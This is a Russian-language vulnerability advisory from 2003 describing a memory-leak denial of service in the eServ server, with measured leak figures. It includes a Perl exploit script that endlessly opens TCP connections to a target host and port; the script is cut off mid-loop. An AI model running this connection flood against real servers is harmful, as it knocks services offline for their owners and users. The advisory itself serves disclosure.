Дата публикации: | 14.05.2003 |
Всего просмотров: | 963 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Отказ в обслуживании обнаружен в eServ. Утечка памяти позволяет удаленному пользователю исчерпать доступные системные ресурсы на целевом сервере.
Сообщается, что удаленный пользователь может подключится к северу несколько тысяч раз, чтобы заставить сервер выделить большое количество памяти, что, в конечном счете, приведет к зависанию сервера. Сообщается, что 100 подключений может вызвать утечку памяти между 7.81 MB и 31.25 MB, а 50.000 подключений приведут к аварийному завершению работы сервера. Эксплоит: #!/usr/bin/perl #LEGAL NOTICE: Don't test this on networks you don't administer, #and do not test this tool on networks you don't own without #permission of the network owner. You are responsible for all #damage due to your use of this tool. use IO::Socket; print "$0: eServ Remote DoS Exploit\r\n"; print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n"; print "Server hostname\: "; $host = trim(chomp($line = <STDIN>)); print "Service port to probe\: "; $port = trim(chomp($line = <STDIN>)); print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; |
Ссылки: | eServ Memory Leak Enables Denial of Service Attacks |